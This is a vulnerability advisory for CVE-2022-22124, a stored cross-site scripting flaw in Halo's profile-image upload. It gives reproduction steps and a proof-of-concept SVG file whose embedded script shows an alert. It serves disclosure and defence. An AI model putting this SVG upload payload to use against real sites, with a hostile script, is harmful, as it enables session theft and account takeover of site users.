
We found results for “”
CVE-2022-22124
Date: January 13, 2022
Overview
In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary javascript to run on a victim’s browser.Details
Halo is a modern open-source blogging and content management system. Affected versions of Halo are vulnerable to stored XSS via profile image upload mechanism that allows the uploading of malicious SVG files.PoC Details
Login to the application.Enter the profile section, and press on the profile picture in order to change it. Click on “upload an attachment”. Choose a malicious SVG file with a payload such as the one given below, and upload it.
Click “deposit” in order to save. The malicious SVG will be saved under “/upload/”.
Once opened, it will trigger an alert.
PoC Code
// Malicious SVG file contents:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="500" height="500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("POC");
</script>
</svg>
Affected Environments
Halo versions v1.0.0 through v1.4.17 (latest)Prevention
No fix is providedLanguage: Java
Good to know:

Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | Low |
Integrity (I): | Low |
Availability (A): | None |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | None |
Additional information: |